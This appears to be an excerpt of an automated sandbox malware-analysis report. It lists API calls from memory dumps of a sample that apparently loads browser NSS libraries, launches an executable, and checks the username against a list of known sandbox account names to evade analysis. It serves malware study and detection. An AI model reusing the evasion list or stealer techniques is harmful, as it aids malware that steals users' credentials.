                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576DE7
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C576E1F
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C576E4B
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C576E72
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576EA7
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576EC4
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576ED5
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C576EE3
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576EF4
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576F08
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C576F35
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576F44
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576F5B
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C576F65
                                                                                                                                                                                            • Part of subcall function 6C576C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C57781D,00000000,6C56BE2C,?,6C576B1D,?,?,?,?,00000000,00000000,6C57781D), ref: 6C576C40
                                                                                                                                                                                            • Part of subcall function 6C576C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C57781D,?,6C56BE2C,?), ref: 6C576C58
                                                                                                                                                                                            • Part of subcall function 6C576C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C57781D), ref: 6C576C6F
                                                                                                                                                                                            • Part of subcall function 6C576C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C576C84
                                                                                                                                                                                            • Part of subcall function 6C576C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C576C96
                                                                                                                                                                                            • Part of subcall function 6C576C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C576CAA
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C576F90
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C576FC5
                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 6C576FF4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                          • String ID: +`Xl
                                                                                                                                                                                          • API String ID: 1304971872-684115500
                                                                                                                                                                                          • Opcode ID: 04a007a03bfcb383e8d03efb82583b1b62b324a8e0561f05b80b3c3474de6d8b
                                                                                                                                                                                          • Instruction ID: b0c38ab9960a0e048103e4f9b097d2195e6ce3001b916416e3703ed402c37d29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 04a007a03bfcb383e8d03efb82583b1b62b324a8e0561f05b80b3c3474de6d8b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FB15DB0E01319AFDF20DBA5DC84B9EBBB4AF05358F140124E815E7600EB35E998CBB1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 00021A13
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(0005ABCC,?), ref: 00021A2E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUserlstrcmpi
                                                                                                                                                                                          • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                                                                                                          • API String ID: 542268695-1784693376
                                                                                                                                                                                          • Opcode ID: c8012752950895fe5342e627cfe3b3eff9e827838fd0fef59e8b1a41a2e3730f
                                                                                                                                                                                          • Instruction ID: dabdf733c771df9ac7a564e1657c4974ccf951340b51b1ec4f19b379470296c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8012752950895fe5342e627cfe3b3eff9e827838fd0fef59e8b1a41a2e3730f
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB21F1B0A0126C8BDF60CF15DD487DEBFF5AB46306F0042D999486A210C7B84ACDCF86
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • _memset.LIBCMT ref: 000327B1
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?), ref: 000327C3
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056698), ref: 000327D5
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,744fd163d6d4e0ac37e4032bcbfbb6af), ref: 000327E7
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005669C), ref: 000327F9
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00032809
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000566A0), ref: 0003281B
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00032824
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,EMPTY), ref: 00032840
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000566AC), ref: 00032852
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00032862
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000566B0), ref: 00032874
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00032881
                                                                                                                                                                                          • _memset.LIBCMT ref: 000328B7
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00032446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00034A8D), ref: 00032460
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,000566B4,?), ref: 00032924
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00032932
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                                          • String ID: .exe$744fd163d6d4e0ac37e4032bcbfbb6af$EMPTY
                                                                                                                                                                                          • API String ID: 141474312-738958351
                                                                                                                                                                                          • Opcode ID: ce0323a3c1a1138b0bbb74825bd1aafc60491615fa2e4f7d0afd2cc927605f66
                                                                                                                                                                                          • Instruction ID: 1331281a8b599293ad9135f4bfdfa235a611d1ab6b211891732526f9a6b610a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0323a3c1a1138b0bbb74825bd1aafc60491615fa2e4f7d0afd2cc927605f66
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6381EFB2D4012DABCF11EFA4EC46ADE777CAB08305F4144E5BB09B7152D630AE898F65
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C572DEC
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C572E00
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C572E2B
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C572E43
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C544F1C,?,-00000001,00000000,?), ref: 6C572E74
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C544F1C,?,-00000001,00000000), ref: 6C572E88
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C572EC6
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C572EE4
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C572EF8
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C572F62
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C572F86
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C572F9E
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C572FCA
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C57301A
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C57302E
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C573066
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C573085
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C5730EC
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C57310C
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C573124
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C57314C
                                                                                                                                                                                            • Part of subcall function 6C559180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C58379E,?,6C559568,00000000,?,6C58379E,?,00000001,?), ref: 6C55918D
                                                                                                                                                                                            • Part of subcall function 6C559180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C58379E,?,6C559568,00000000,?,6C58379E,?,00000001,?), ref: 6C5591A0
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207AD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207CD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207D6
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4B204A), ref: 6C5207E4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,6C4B204A), ref: 6C520864
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C520880
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,6C4B204A), ref: 6C5208CB
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208D7
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208FB
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C57316D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3383223490-0
                                                                                                                                                                                          • Opcode ID: 8ce7547eecfa34492f95ebc40075bd9ca0c90e568db811f294f90c1ffa679601
                                                                                                                                                                                          • Instruction ID: ea1b24c1ae7fd4145849006d0dc2721a1f745ae30ac5c6beefb95694ec796a86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ce7547eecfa34492f95ebc40075bd9ca0c90e568db811f294f90c1ffa679601
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF18CB1D00209EFDF10DF69DC88AA9BBB4BF09318F144169EC15A7711EB31E995CBA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_Digest), ref: 6C566D86
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C566DB4
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C566DC3
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C566DD9
                                                                                                                                                                                          • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C566DFA
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C566E13
                                                                                                                                                                                          • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C566E2C
                                                                                                                                                                                          • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C566E47
                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C566EB9
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$ndl
                                                                                                                                                                                          • API String ID: 1003633598-923097276
                                                                                                                                                                                          • Opcode ID: b1df4944c066d92697ca64e9a3e2fdd760e69c32add6813e7dbd48fa4987f8e7
                                                                                                                                                                                          • Instruction ID: 278013e893973f44690d5d55e9cb6c2aad075e22ce0f831d1076e6871d070bbc
                                                                                                                                                                                          • Opcode Fuzzy Hash: b1df4944c066d92697ca64e9a3e2fdd760e69c32add6813e7dbd48fa4987f8e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: AB418135601115EFDB009F56DD89A8A3BB1AFC6319F448025E90897A21DB30DD68CF9E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C574C4C
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C574C60
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574CA1
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C574CBE
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574CD2
                                                                                                                                                                                          • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C574D3A
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C574D4F
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574DB7
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207AD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207CD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207D6
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4B204A), ref: 6C5207E4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,6C4B204A), ref: 6C520864
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C520880
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,6C4B204A), ref: 6C5208CB
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208D7
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208FB
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C574DD7
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C574DEC
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C574E1B
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C574E2F
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C574E5A
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C574E71
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C574E7A
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C574EA2
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C574EC1
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C574ED6
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C574F01
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C574F2A
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 759471828-0
                                                                                                                                                                                          • Opcode ID: 8b654730ed07f3aee80019ca591e23630ab2b9919ad17459c81fa4b0fd37f16b
                                                                                                                                                                                          • Instruction ID: 86036046c6fa0143508cdf71d2cac1a5c26ca78d73e8e93407d82bd4f16a8c30
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b654730ed07f3aee80019ca591e23630ab2b9919ad17459c81fa4b0fd37f16b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FB10475A00205EFDB10EF69DC84AAA77B4BF4A318F054124ED1597B41EB34E9A4CFE2
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C564E83
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C564EB8
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C564EC7
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C564EDD
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C564F0B
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C564F1A
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C564F30
                                                                                                                                                                                          • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C564F4F
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C564F68
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$ndl
                                                                                                                                                                                          • API String ID: 1003633598-2103706748
                                                                                                                                                                                          • Opcode ID: 6112d1050788303c8189b39580a2e37a97ea2b16605fb0a68736e21793c2c067
                                                                                                                                                                                          • Instruction ID: d499228f9db4a6b1636a7b8c5e1c8137b481d99271e63cd195801e88e1a18376
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6112d1050788303c8189b39580a2e37a97ea2b16605fb0a68736e21793c2c067
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A41BE35601105EFDB00DF56DC98F9A77B5AB8231DF448424E5089BF61DB309D58CBAE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C564CF3
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C564D28
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C564D37
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C564D4D
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C564D7B
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C564D8A
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C564DA0
                                                                                                                                                                                          • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C564DBC
                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C564E20
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$ndl
                                                                                                                                                                                          • API String ID: 1003633598-1744907125
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,759183C0,00000000,0003C55B,?), ref: 0003B875
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,0005613C), ref: 0003B8A3
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.zip), ref: 0003B8B3
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 0003B8BF
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.arc), ref: 0003B8CB
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 0003B8D7
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.arj), ref: 0003B8E3
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.gz), ref: 0003B8EF
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 0003B8FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                          • API String ID: 1659193697-51310709
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C588E01,00000000,6C589060,6C690B64), ref: 6C588E7B
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588E9E
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(6C690B64,00000001,?,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588EAD
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588EC3
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588ED8
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C588E01,00000000,6C589060,6C690B64), ref: 6C588EE5
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C588E01), ref: 6C588EFB
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C690B64,6C690B64), ref: 6C588F11
                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C588F3F
                                                                                                                                                                                            • Part of subcall function 6C58A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C58A421,00000000,00000000,6C589826), ref: 6C58A136
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C58904A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C588E76
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                          • API String ID: 977052965-1032500510
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C538E5B
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C538E81
                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C538EED
                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C6618D0,?), ref: 6C538F03
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C692AA4,6C5912D0), ref: 6C538F19
